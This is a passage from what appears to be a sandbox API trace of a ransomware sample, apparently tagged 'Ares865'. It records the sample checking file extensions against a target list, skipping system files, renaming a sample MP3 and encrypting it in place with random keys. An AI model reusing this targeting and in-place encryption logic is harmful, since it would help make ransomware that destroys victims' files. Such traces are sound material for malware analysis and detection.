(lpString="4dd") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="4dd") returned 1 [0050.295] lstrlenW (lpString="4dl") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="4dl") returned 1 [0050.295] lstrlenW (lpString="^^^") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="^^^") returned 1 [0050.295] lstrlenW (lpString="abs") returned 3 [0050.295] lstrcmpiW (lpString1="mp3", lpString2="abs") returned 1 [0050.295] lstrlenW (lpString="abx") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="abx") returned 1 [0050.296] lstrlenW (lpString="accdb") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accdb") returned -1 [0050.296] lstrlenW (lpString="accdc") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accdc") returned -1 [0050.296] lstrlenW (lpString="accde") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accde") returned -1 [0050.296] lstrlenW (lpString="accdr") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accdr") returned -1 [0050.296] lstrlenW (lpString="accdt") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accdt") returned -1 [0050.296] lstrlenW (lpString="accdw") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accdw") returned -1 [0050.296] lstrlenW (lpString="accft") returned 5 [0050.296] lstrcmpiW (lpString1="a.mp3", lpString2="accft") returned -1 [0050.296] lstrlenW (lpString="adb") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0050.296] lstrlenW (lpString="adb") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0050.296] lstrlenW (lpString="ade") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="ade") returned 1 [0050.296] lstrlenW (lpString="adf") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="adf") returned 1 [0050.296] lstrlenW (lpString="adn") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="adn") returned 1 [0050.296] lstrlenW (lpString="adp") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="adp") returned 1 [0050.296] lstrlenW (lpString="alf") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="alf") returned 1 [0050.296] lstrlenW (lpString="ask") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="ask") returned 1 [0050.296] lstrlenW (lpString="btr") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="btr") returned 1 [0050.296] lstrlenW (lpString="cat") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="cat") returned 1 [0050.296] lstrlenW (lpString="cdb") returned 3 [0050.296] lstrcmpiW (lpString1="mp3", lpString2="cdb") returned 1 [0050.296] lstrlenW (lpString="ckp") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="ckp") returned 1 [0050.297] lstrlenW (lpString="cma") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="cma") returned 1 [0050.297] lstrlenW (lpString="cpd") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="cpd") returned 1 [0050.297] lstrlenW (lpString="dacpac") returned 6 [0050.297] lstrcmpiW (lpString1="ba.mp3", lpString2="dacpac") returned -1 [0050.297] lstrlenW (lpString="dad") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dad") returned 1 [0050.297] lstrlenW (lpString="dadiagrams") returned 10 [0050.297] lstrcmpiW (lpString1="alimba.mp3", lpString2="dadiagrams") returned -1 [0050.297] lstrlenW (lpString="daschema") returned 8 [0050.297] lstrcmpiW (lpString1="imba.mp3", lpString2="daschema") returned 1 [0050.297] lstrlenW (lpString="db-journal") returned 10 [0050.297] lstrcmpiW (lpString1="alimba.mp3", lpString2="db-journal") returned -1 [0050.297] lstrlenW (lpString="db-shm") returned 6 [0050.297] lstrcmpiW (lpString1="ba.mp3", lpString2="db-shm") returned -1 [0050.297] lstrlenW (lpString="db-wal") returned 6 [0050.297] lstrcmpiW (lpString1="ba.mp3", lpString2="db-wal") returned -1 [0050.297] lstrlenW (lpString="dbc") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dbc") returned 1 [0050.297] lstrlenW (lpString="dbs") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dbs") returned 1 [0050.297] lstrlenW (lpString="dbt") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dbt") returned 1 [0050.297] lstrlenW (lpString="dbv") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dbv") returned 1 [0050.297] lstrlenW (lpString="dbx") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dbx") returned 1 [0050.297] lstrlenW (lpString="dcb") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dcb") returned 1 [0050.297] lstrlenW (lpString="dct") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dct") returned 1 [0050.297] lstrlenW (lpString="dcx") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="dcx") returned 1 [0050.297] lstrlenW (lpString="ddl") returned 3 [0050.297] lstrcmpiW (lpString1="mp3", lpString2="ddl") returned 1 [0050.297] lstrlenW (lpString="dlis") returned 4 [0050.298] lstrcmpiW (lpString1=".mp3", lpString2="dlis") returned -1 [0050.298] lstrlenW (lpString="dp1") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="dp1") returned 1 [0050.298] lstrlenW (lpString="dqy") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="dqy") returned 1 [0050.298] lstrlenW (lpString="dsk") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="dsk") returned 1 [0050.298] lstrlenW (lpString="dsn") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="dsn") returned 1 [0050.298] lstrlenW (lpString="dtsx") returned 4 [0050.298] lstrcmpiW (lpString1=".mp3", lpString2="dtsx") returned -1 [0050.298] lstrlenW (lpString="dxl") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="dxl") returned 1 [0050.298] lstrlenW (lpString="eco") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="eco") returned 1 [0050.298] lstrlenW (lpString="ecx") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="ecx") returned 1 [0050.298] lstrlenW (lpString="edb") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="edb") returned 1 [0050.298] lstrlenW (lpString="epim") returned 4 [0050.298] lstrcmpiW (lpString1=".mp3", lpString2="epim") returned -1 [0050.298] lstrlenW (lpString="fcd") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fcd") returned 1 [0050.298] lstrlenW (lpString="fdb") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fdb") returned 1 [0050.298] lstrlenW (lpString="fic") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fic") returned 1 [0050.298] lstrlenW (lpString="flexolibrary") returned 12 [0050.298] lstrlenW (lpString="fm5") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fm5") returned 1 [0050.298] lstrlenW (lpString="fmp") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fmp") returned 1 [0050.298] lstrlenW (lpString="fmp12") returned 5 [0050.298] lstrcmpiW (lpString1="a.mp3", lpString2="fmp12") returned -1 [0050.298] lstrlenW (lpString="fmpsl") returned 5 [0050.298] lstrcmpiW (lpString1="a.mp3", lpString2="fmpsl") returned -1 [0050.298] lstrlenW (lpString="fol") returned 3 [0050.298] lstrcmpiW (lpString1="mp3", lpString2="fol") returned 1 [0050.299] lstrlenW (lpString="fp3") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="fp3") returned 1 [0050.299] lstrlenW (lpString="fp4") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="fp4") returned 1 [0050.299] lstrlenW (lpString="fp5") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="fp5") returned 1 [0050.299] lstrlenW (lpString="fp7") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="fp7") returned 1 [0050.299] lstrlenW (lpString="fpt") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="fpt") returned 1 [0050.299] lstrlenW (lpString="frm") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="frm") returned 1 [0050.299] lstrlenW (lpString="gdb") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0050.299] lstrlenW (lpString="gdb") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="gdb") returned 1 [0050.299] lstrlenW (lpString="grdb") returned 4 [0050.299] lstrcmpiW (lpString1=".mp3", lpString2="grdb") returned -1 [0050.299] lstrlenW (lpString="gwi") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="gwi") returned 1 [0050.299] lstrlenW (lpString="hdb") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="hdb") returned 1 [0050.299] lstrlenW (lpString="his") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="his") returned 1 [0050.299] lstrlenW (lpString="ib") returned 2 [0050.299] lstrcmpiW (lpString1="p3", lpString2="ib") returned 1 [0050.299] lstrlenW (lpString="idb") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="idb") returned 1 [0050.299] lstrlenW (lpString="ihx") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="ihx") returned 1 [0050.299] lstrlenW (lpString="itdb") returned 4 [0050.299] lstrcmpiW (lpString1=".mp3", lpString2="itdb") returned -1 [0050.299] lstrlenW (lpString="itw") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="itw") returned 1 [0050.299] lstrlenW (lpString="jet") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="jet") returned 1 [0050.299] lstrlenW (lpString="jtx") returned 3 [0050.299] lstrcmpiW (lpString1="mp3", lpString2="jtx") returned 1 [0050.300] lstrlenW (lpString="kdb") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="kdb") returned 1 [0050.300] lstrlenW (lpString="kexi") returned 4 [0050.300] lstrcmpiW (lpString1=".mp3", lpString2="kexi") returned -1 [0050.300] lstrlenW (lpString="kexic") returned 5 [0050.300] lstrcmpiW (lpString1="a.mp3", lpString2="kexic") returned -1 [0050.300] lstrlenW (lpString="kexis") returned 5 [0050.300] lstrcmpiW (lpString1="a.mp3", lpString2="kexis") returned -1 [0050.300] lstrlenW (lpString="lgc") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="lgc") returned 1 [0050.300] lstrlenW (lpString="lwx") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="lwx") returned 1 [0050.300] lstrlenW (lpString="maf") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="maf") returned 1 [0050.300] lstrlenW (lpString="maq") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="maq") returned 1 [0050.300] lstrlenW (lpString="mar") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mar") returned 1 [0050.300] lstrlenW (lpString="marshal") returned 7 [0050.300] lstrcmpiW (lpString1="mba.mp3", lpString2="marshal") returned 1 [0050.300] lstrlenW (lpString="mas") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mas") returned 1 [0050.300] lstrlenW (lpString="mav") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mav") returned 1 [0050.300] lstrlenW (lpString="maw") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="maw") returned 1 [0050.300] lstrlenW (lpString="mdbhtml") returned 7 [0050.300] lstrcmpiW (lpString1="mba.mp3", lpString2="mdbhtml") returned -1 [0050.300] lstrlenW (lpString="mdn") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mdn") returned 1 [0050.300] lstrlenW (lpString="mdt") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mdt") returned 1 [0050.300] lstrlenW (lpString="mfd") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mfd") returned 1 [0050.300] lstrlenW (lpString="mpd") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mpd") returned -1 [0050.300] lstrlenW (lpString="mrg") returned 3 [0050.300] lstrcmpiW (lpString1="mp3", lpString2="mrg") returned -1 [0050.301] lstrlenW (lpString="mud") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="mud") returned -1 [0050.301] lstrlenW (lpString="mwb") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="mwb") returned -1 [0050.301] lstrlenW (lpString="myd") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="myd") returned -1 [0050.301] lstrlenW (lpString="ndf") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="ndf") returned -1 [0050.301] lstrlenW (lpString="nnt") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="nnt") returned -1 [0050.301] lstrlenW (lpString="nrmlib") returned 6 [0050.301] lstrcmpiW (lpString1="ba.mp3", lpString2="nrmlib") returned -1 [0050.301] lstrlenW (lpString="ns2") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="ns2") returned -1 [0050.301] lstrlenW (lpString="ns3") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="ns3") returned -1 [0050.301] lstrlenW (lpString="ns4") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="ns4") returned -1 [0050.301] lstrlenW (lpString="nsf") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="nsf") returned -1 [0050.301] lstrlenW (lpString="nv") returned 2 [0050.301] lstrcmpiW (lpString1="p3", lpString2="nv") returned 1 [0050.301] lstrlenW (lpString="nv2") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="nv2") returned -1 [0050.301] lstrlenW (lpString="nwdb") returned 4 [0050.301] lstrcmpiW (lpString1=".mp3", lpString2="nwdb") returned -1 [0050.301] lstrlenW (lpString="nyf") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="nyf") returned -1 [0050.301] lstrlenW (lpString="odb") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0050.301] lstrlenW (lpString="odb") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="odb") returned -1 [0050.301] lstrlenW (lpString="oqy") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="oqy") returned -1 [0050.301] lstrlenW (lpString="ora") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="ora") returned -1 [0050.301] lstrlenW (lpString="orx") returned 3 [0050.301] lstrcmpiW (lpString1="mp3", lpString2="orx") returned -1 [0050.302] lstrlenW (lpString="owc") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="owc") returned -1 [0050.302] lstrlenW (lpString="p96") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="p96") returned -1 [0050.302] lstrlenW (lpString="p97") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="p97") returned -1 [0050.302] lstrlenW (lpString="pan") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="pan") returned -1 [0050.302] lstrlenW (lpString="pdb") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="pdb") returned -1 [0050.302] lstrlenW (lpString="pdm") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="pdm") returned -1 [0050.302] lstrlenW (lpString="pnz") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="pnz") returned -1 [0050.302] lstrlenW (lpString="qry") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="qry") returned -1 [0050.302] lstrlenW (lpString="qvd") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="qvd") returned -1 [0050.302] lstrlenW (lpString="rbf") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="rbf") returned -1 [0050.302] lstrlenW (lpString="rctd") returned 4 [0050.302] lstrcmpiW (lpString1=".mp3", lpString2="rctd") returned -1 [0050.302] lstrlenW (lpString="rod") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="rod") returned -1 [0050.302] lstrlenW (lpString="rodx") returned 4 [0050.302] lstrcmpiW (lpString1=".mp3", lpString2="rodx") returned -1 [0050.302] lstrlenW (lpString="rpd") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="rpd") returned -1 [0050.302] lstrlenW (lpString="rsd") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="rsd") returned -1 [0050.302] lstrlenW (lpString="sas7bdat") returned 8 [0050.302] lstrcmpiW (lpString1="imba.mp3", lpString2="sas7bdat") returned -1 [0050.302] lstrlenW (lpString="sbf") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="sbf") returned -1 [0050.302] lstrlenW (lpString="scx") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="scx") returned -1 [0050.302] lstrlenW (lpString="sdb") returned 3 [0050.302] lstrcmpiW (lpString1="mp3", lpString2="sdb") returned -1 [0050.303] lstrlenW (lpString="sdc") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="sdc") returned -1 [0050.303] lstrlenW (lpString="sdf") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="sdf") returned -1 [0050.303] lstrlenW (lpString="sis") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="sis") returned -1 [0050.303] lstrlenW (lpString="spq") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="spq") returned -1 [0050.303] lstrlenW (lpString="te") returned 2 [0050.303] lstrcmpiW (lpString1="p3", lpString2="te") returned -1 [0050.303] lstrlenW (lpString="teacher") returned 7 [0050.303] lstrcmpiW (lpString1="mba.mp3", lpString2="teacher") returned -1 [0050.303] lstrlenW (lpString="tmd") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="tmd") returned -1 [0050.303] lstrlenW (lpString="tps") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="tps") returned -1 [0050.303] lstrlenW (lpString="trc") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0050.303] lstrlenW (lpString="trc") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="trc") returned -1 [0050.303] lstrlenW (lpString="trm") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="trm") returned -1 [0050.303] lstrlenW (lpString="udb") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="udb") returned -1 [0050.303] lstrlenW (lpString="udl") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="udl") returned -1 [0050.303] lstrlenW (lpString="usr") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="usr") returned -1 [0050.303] lstrlenW (lpString="v12") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="v12") returned -1 [0050.303] lstrlenW (lpString="vis") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="vis") returned -1 [0050.303] lstrlenW (lpString="vpd") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="vpd") returned -1 [0050.303] lstrlenW (lpString="vvv") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="vvv") returned -1 [0050.303] lstrlenW (lpString="wdb") returned 3 [0050.303] lstrcmpiW (lpString1="mp3", lpString2="wdb") returned -1 [0050.304] lstrlenW (lpString="wmdb") returned 4 [0050.304] lstrcmpiW (lpString1=".mp3", lpString2="wmdb") returned -1 [0050.304] lstrlenW (lpString="wrk") returned 3 [0050.304] lstrcmpiW (lpString1="mp3", lpString2="wrk") returned -1 [0050.304] lstrlenW (lpString="xdb") returned 3 [0050.304] lstrcmpiW (lpString1="mp3", lpString2="xdb") returned -1 [0050.304] lstrlenW (lpString="xld") returned 3 [0050.304] lstrcmpiW (lpString1="mp3", lpString2="xld") returned -1 [0050.304] lstrlenW (lpString="xmlff") returned 5 [0050.304] lstrcmpiW (lpString1="a.mp3", lpString2="xmlff") returned -1 [0050.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.Ares865") returned 54 [0050.304] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.ares865"), dwFlags=0x1) returned 1 [0050.305] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.Ares865" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0050.305] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8414449) returned 1 [0050.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0050.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6040 [0050.305] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0050.305] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0050.306] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0050.306] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0050.306] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x806800, lpName=0x0) returned 0x168 [0050.307] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x800000, dwNumberOfBytesToMap=0x6800) returned 0x190000 [0050.353] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3240000 [0051.538] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0051.538] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0051.538] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0051.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd8 [0051.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbd8 | out: hHeap=0x2b0000) returned 1 [0051.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31efc8 [0051.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x330fc8 [0051.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0051.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3310e0 [0051.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0051.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3310e0 | out: hHeap=0x2b0000) returned 1 [0051.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0051.539] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x330fc8 | out: hHeap=0x2b0000) returned 1 [0051.539] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0051.540] CloseHandle (hObject=0x168) returned 1 [0051.540] CloseHandle (hObject=0x12c) returned 1 [0051.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6040 | out: hHeap=0x2b0000) returned 1 [0051.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0051.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0051.850] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="aoldtz.exe") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="..") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="windows") returned -1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="bootmgr") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="temp") returned -1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="pagefile.sys") returned -1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="boot") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="ids.txt") returned 1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="ntuser.dat") returned -1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="perflogs") returned -1 [0051.850] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="MSBuild") returned -1 [0051.850] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0051.850] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 46 [0051.851] lstrcpyW (in: lpString1=0x2cce446, lpString2="Maid with the Flaxen Hair.mp3" | out: lpString1="Maid with the Flaxen Hair.mp3") returned="Maid with the Flaxen Hair.mp3" [0051.851] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0051.851] lstrlenW (lpString="Ares865") returned 7 [0051.851] lstrcmpiW (lpString1="air.mp3", lpString2="Ares865") returned -1 [0051.851] lstrlenW (lpString=".dll") returned 4 [0051.851] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".dll") returned 1 [0051.851] lstrlenW (lpString=".lnk") returned 4 [0051.851] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".lnk") returned 1 [0051.851] lstrlenW (lpString=".ini") returned 4 [0051.851] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".ini") returned 1 [0051.851] lstrlenW (lpString=".sys") returned 4 [0051.851] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2=".sys") returned 1 [0051.851] lstrlenW (lpString="Maid with the Flaxen Hair.mp3") returned 29 [0051.851] lstrlenW (lpString="bak") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="bak") returned 1 [0051.851] lstrlenW (lpString="ba_") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="ba_") returned 1 [0051.851] lstrlenW (lpString="dbb") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="dbb") returned 1 [0051.851] lstrlenW (lpString="vmdk") returned 4 [0051.851] lstrcmpiW (lpString1=".mp3", lpString2="vmdk") returned -1 [0051.851] lstrlenW (lpString="rar") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="rar") returned -1 [0051.851] lstrlenW (lpString="zip") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="zip") returned -1 [0051.851] lstrlenW (lpString="tgz") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="tgz") returned -1 [0051.851] lstrlenW (lpString="vbox") returned 4 [0051.851] lstrcmpiW (lpString1=".mp3", lpString2="vbox") returned -1 [0051.851] lstrlenW (lpString="vdi") returned 3 [0051.851] lstrcmpiW (lpString1="mp3", lpString2="vdi") returned -1 [0051.851] lstrlenW (lpString="vhd") returned 3 [0051.851] lstrcmpiW 